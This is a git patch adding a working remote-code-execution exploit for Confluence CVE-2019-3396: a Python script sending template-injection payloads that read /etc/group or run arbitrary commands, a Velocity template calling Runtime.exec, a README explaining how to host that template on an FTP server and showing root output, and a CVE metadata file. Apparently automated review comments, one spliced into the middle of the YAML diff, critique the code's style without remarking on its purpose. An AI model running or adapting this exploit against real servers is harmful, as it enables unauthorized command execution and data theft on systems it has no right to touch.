From 0766a5e57d88d38b1fdaf4fdd807c21bde2fb687 Mon Sep 17 00:00:00 2001
From: yangjipeng
Date: Thu, 20 Oct 2022 14:00:40 +0800
Subject: [PATCH] ADD CVE-2019-3396
---
 cve/confluence/2019/CVE-2019-3396/RCE_exp.py | 61 ++++++++++++++++++++
 cve/confluence/2019/CVE-2019-3396/README.md | 9 +++
 cve/confluence/2019/CVE-2019-3396/cmd.vm | 9 +++
 cve/confluence/yaml/CVE-2019-3396.yaml | 23 ++++++++
 vulnerability_list.yaml | 2 +
 5 files changed, 104 insertions(+)
 create mode 100644 cve/confluence/2019/CVE-2019-3396/RCE_exp.py
 create mode 100644 cve/confluence/2019/CVE-2019-3396/README.md
 create mode 100644 cve/confluence/2019/CVE-2019-3396/cmd.vm
 create mode 100644 cve/confluence/yaml/CVE-2019-3396.yaml
diff --git a/cve/confluence/2019/CVE-2019-3396/RCE_exp.py b/cve/confluence/2019/CVE-2019-3396/RCE_exp.py
new file mode 100644
index 00000000..5517dfb1
--- /dev/null
+++ b/cve/confluence/2019/CVE-2019-3396/RCE_exp.py
@@ -0,0 +1,61 @@
+# -*- coding: utf-8 -*-
+import re
+import sys
+import requests
+import ssl
+try:
+ _create_unverified_https_context = ssl._create_unverified_context
+except AttributeError:
+ pass
+else:
+ ssl._create_default_https_context = _create_unverified_https_context
+
+def _read(url):
+ result = {}
+ # filename = "../web.xml"
+ filename = 'file:////etc/group'
+
+ paylaod = url + "/rest/tinymce/1/macro/preview"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
+ "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
+ "Content-Type": "application/json; charset=utf-8"
+ }
+ data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
+ r = requests.post(paylaod, data=data, headers=headers)
+ # print r.content
+ if r.status_code == 200 and "wiki-content" in r.text:
+ m = re.findall('.*wiki-content">\n(.*)\n \n', r.text, re.S)
+
+ return m[0]
+
+
+def _exec(url,cmd):
+ result = {}
+ filename = "ftp://1.1.1.1/cmd.vm"
+
+ paylaod = url + "/rest/tinymce/1/macro/preview"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
+ "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
+ "Content-Type": "application/json; charset=utf-8"
+ }
+ data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"http://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"%s","cmd":"%s"}}}' % (filename,cmd)
+ r = requests.post(paylaod, data=data, headers=headers)
+ # print r.content
+ if r.status_code == 200 and "wiki-content" in r.text:
+ m = re.findall('.*wiki-content">\n(.*)\n \n', r.text, re.S)
+
+ return m[0]
+
+
+if __name__ == '__main__':
+
+ if len(sys.argv) != 3:
+ print 'Usage: RCE_exp.py 
http[s]://target.com:8080/ "ls -al"'
+ sys.exit(0)
+ url = sys.argv[1]
+ cmd = sys.argv[2]
+ print _exec(url,cmd)
diff --git a/cve/confluence/2019/CVE-2019-3396/README.md b/cve/confluence/2019/CVE-2019-3396/README.md
new file mode 100644
index 00000000..e89eb5fa
--- /dev/null
+++ b/cve/confluence/2019/CVE-2019-3396/README.md
@@ -0,0 +1,9 @@
+# CVE-2019-3396_EXP
+CVE-2019-3396 confluence SSTI RCE
+
+1、put the cmd.vm on your website (must use ftp or https ,http doesn't work )
+2、modify RCE_exp.py ,change the filename = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21)
+3、python REC_exp.py http://test.wiki_test.cc:8080 "whoami"
+
+$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
+uid=0(root) gid=0(root) groups=0(root)
diff --git a/cve/confluence/2019/CVE-2019-3396/cmd.vm b/cve/confluence/2019/CVE-2019-3396/cmd.vm
new file mode 100644
index 00000000..7a18cc07
--- /dev/null
+++ b/cve/confluence/2019/CVE-2019-3396/cmd.vm
@@ -0,0 +1,9 @@
+#set ($e="exp")
+#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
+#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
+#set($sc = $e.getClass().forName("java.util.Scanner"))
+#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
+#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
+#if($scan.hasNext())
+ $scan.next()
+#end
diff --git a/cve/confluence/yaml/CVE-2019-3396.yaml b/cve/confluence/yaml/CVE-2019-3396.yaml
new file mode 100644
index 00000000..e91ff6d3
--- /dev/null
+++ b/cve/confluence/yaml/CVE-2019-3396.yaml
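Review bot: The try/except/else block at the top of RCE_exp.py overwrites `ssl._create_default_https_context` process-wide through private CPython attributes, so every TLS connection the interpreter opens afterwards skips certificate validation, not just the two `requests.post` calls; and because `requests` builds its own SSL context via urllib3, the patch most likely does not even reach those calls, so the intent is unclear. Passing `verify=` explicitly on each `requests.post` (a CA bundle path, with validation kept on by default) and a `timeout=` would make the trust decision and the failure mode visible instead of global and silent. In `_exec`, `return m[0]` is only reached when the status is 200 and `wiki-content` is present, so the function returns `None` otherwise and `print _exec(url,cmd)` prints `None`, while a non-matching regex makes `m[0]` raise `IndexError`; a guard such as `if not m: return None` before the index covers that. `_read` is never called, both `result = {}` assignments are unused, `paylaod` is misspelt, and the `print` statements are Python 2 only; the README in the same patch also invokes `REC_exp.py` while the file and its usage string say `RCE_exp.py`.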
@@ -0,0 +1,23 @@
+id: CVE-2019-3396
+source:
+info:
+ name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。
+ severity: critical
+ description: |
+ Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。
+ scope-of-influence:
+ 6.6.x≤ Confluence <6.6.12
+ 6.12.x≤ Confluence <6.12.3
+ 6.13.x≤ Confluence <6.13.13
+ 6.14.x≤ Confluence <6.14.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-3396
+ - https://jira.atlassian.com/browse/CONFSERVER-57974
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-3396
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags: RCE,cve2019,任意文件读取
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 479880b2..f1290627 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -15,5 +15,7 @@ cve:
 - CVE-2021-3156
 gitlab:
 - CVE-2021-22205
+ confluence:
+ - CVE-2019-3396
 cnvd:
 kve:
\ No newline at end of file
-- Gitee
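Review bot: The four version ranges under `scope-of-influence:` in CVE-2019-3396.yaml are written as bare lines with no `- ` prefix, so if they are indented as plain text a YAML parser folds them into one scalar (`6.6.x≤ Confluence <6.6.12 6.12.x≤ Confluence <6.12.3 …`) rather than four entries, and if they sit at the key's indent the file fails to parse; writing them as a list in the same style as `reference:` (`- 6.6.x≤ Confluence <6.6.12` and so on) or as a `|` block keeps each affected range distinct for whatever consumes this record. `cnvd-id: None` and `kve-id: None` parse as the string `None`, not a null, so a consumer checking for an absent identifier sees a truthy value; `source:` on the same file is left empty instead, and the two conventions should agree (`~` or an empty value both mean absent). The `name:` field carries a product description while the CVE's own title is missing, and the file ends without a trailing newline, as `\ No newline at end of file` shows.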